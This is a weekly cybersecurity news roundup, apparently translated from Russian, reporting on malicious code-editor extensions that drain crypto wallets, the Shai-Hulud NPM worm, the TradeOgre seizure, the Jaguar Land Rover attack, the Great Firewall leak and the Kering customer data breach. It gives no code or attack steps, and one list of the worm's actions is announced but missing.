«Эскалация киберугроз: от кражи криптовалюты до утечек данных клиентов люксовых брендов» Headline: Escalation of Cyber Threats: From Cryptocurrency Theft to Data Leaks of Luxury Brand Clients

We have compiled the most significant cybersecurity news from the past week.

Software developers are increasingly attracting crypto thieves. According to cybersecurity researchers at Koi Security, the hacking group WhiteCobra has targeted users of coding environments such as VSCode, Cursor, and Windsurf. They have uploaded 24 malicious extensions onto the Visual Studio Marketplace and the Open VSX registry.

One of the victims of these «drainers» was leading Ethereum developer Zak Cole. He reported that cybercriminals stole cryptocurrency using a plugin for the AI code editor Cursor. Cole explained that the extension had all the characteristics of a benign product: a professionally designed logo, a detailed description, and 54,000 downloads on OpenVSX—Cursor’s official registry.

Koi Security believes that WhiteCobra belongs to the same group that, in July, stole digital assets worth $500,000 from a Russian blockchain programmer.

“Cross-compatibility and the lack of proper verification when publishing on these platforms make them ideal for attackers seeking to conduct widespread campaigns,” states the Koi Security report.

The wallet draining starts with the execution of the main file extension.js, which closely resembles the standard Hello World template that comes with each VSCode extension template. Subsequently, the malware unpacks a stealer depending on the type of operating system.

WhiteCobra’s targets are digital asset holders with amounts ranging from $10,000 to $500,000. Analysts believe the group can initiate a new campaign in under three hours.

So far, it has been difficult to halt the attackers; while malicious plugins are removed from OpenVSX, new ones immediately appear in their place.

Researchers recommend using only reputable projects and exercising caution with new releases that suddenly amass a large number of downloads and positive reviews in a short period.

The Royal Canadian Mounted Police conducted the largest cryptocurrency seizure in Canadian history. This was brought to attention by on-chain investigator ZachXBT.

Authorities seized digital assets worth over 56 million Canadian dollars (approximately $40.5 million) from the TradeOgre platform. The closure of this cryptocurrency exchange marked the first incident of its kind in the country.

The investigation began in June 2024 at the behest of Europol. It revealed that the platform violated Canadian laws and had not registered with the Financial Transactions and Reports Analysis Centre as a money exchange service.

Investigators suspect that a large portion of the funds used on TradeOgre originated from criminal sources. The platform attracted cybercriminals due to the absence of mandatory user identification.

According to the police statement, transaction data obtained from TradeOgre will be analyzed to enable charges. The investigation is ongoing.

Following an attack on the NPM platform aimed at injecting malware into JavaScript packages, attackers shifted to a strategy of disseminating a full-fledged «worm.» The incident is escalating, with reports of over 500 compromised NPM packages.

The coordinated campaign known as Shai-Hulud commenced on September 15 with the compromise of the NPM package @ctrl/tinycolor, which is downloaded more than 2 million times weekly.

According to analysts at Truesec, the campaign has significantly expanded within this timeframe and now includes packages published under the CrowdStrike namespace.

Experts state that the compromised variants contain functionality that extracts the package’s tar archive, modifies the package.json file, injects a local script, repackages it, and republished it. Upon installation, a script is automatically executed that downloads and runs TruffleHog—a legitimate tool used for scanning secrets and token discovery.

Truesec believes the attack is rapidly scaling up and becoming more sophisticated. Although the attackers are employing many old techniques, they have significantly enhanced their approach, evolving it into a fully autonomous “worm.” The malware performs the following actions:

A standout feature of this attack is its style. Rather than relying on a single infected object, it autonomously spreads across all NPM packages.

Jaguar Land Rover (JLR) has been unable to resume production for the third consecutive week due to a cyberattack. The luxury car manufacturer announced that its production lines will remain halted at least until September 24.

The company confirmed that attackers have stolen information from its network, but have not yet attributed the attack to a specific hacker group.

According to BleepingComputer, the cybercriminal group Scattered Lapsus$ Hunters claimed responsibility for the attack, posting screenshots of JLR’s internal system on a Telegram channel. The message alleges that the hackers also deployed ransomware on the compromised infrastructure of the company.

The BBC estimates that each week of downtime costs the company a minimum of £50 million (about $68 million). Meanwhile, The Telegraph estimates losses for the same period to be around $100 million. JLR’s suppliers are worried about being unable to handle the unexpected crisis and fear bankruptcy.

On September 12, researchers from the Great Firewall Report team reported the largest data leak in the history of the «Great Chinese Firewall.»

Approximately 600 GB of internal documents, source codes, and internal communications used to create and maintain China’s national traffic filtering system were leaked online.

Researchers state that the leak includes comprehensive build systems for traffic tracking platforms and modules responsible for recognizing and slowing down specific circumvention tools. Most of the stack is aimed at detecting unauthorized VPNs in China.

Great Firewall Report specialists claim that some of the documentation pertains to the Tiangou platform—a commercial product intended for use by ISPs and border gateways. Experts believe that the program’s initial iterations were deployed on HP and Dell servers.

Moreover, the disclosed documents mention the installation of this software in 26 data centers in Myanmar. The system was allegedly managed by a state telecommunications company and integrated into major internet traffic exchange points, allowing for both mass blocking and selective filtering.

According to Wired and Amnesty International, the infrastructure has also been exported to Pakistan, Ethiopia, Kazakhstan, and other countries, where it is used in conjunction with other lawful traffic interception platforms.

On September 15, Kering, the parent company of numerous luxury brands, confirmed a data breach affecting customers of its subsidiaries Gucci, Balenciaga, Alexander McQueen, and Yves Saint Laurent.

According to the BBC, hackers stole personal information, including names, email addresses, phone numbers, home addresses, and overall spending amounts by customers in stores worldwide.

The attack is believed to be linked to the hacker group ShinyHunters, which claims to have stolen personal data from at least 7 million people, although the actual number of victims is likely much higher.

The group is also suspected of involvement in the theft of multiple databases hosted on Salesforce. Several companies, including Allianz Life, Google, Qantas, and Workday, have confirmed the theft of data as a result of these massive hacks.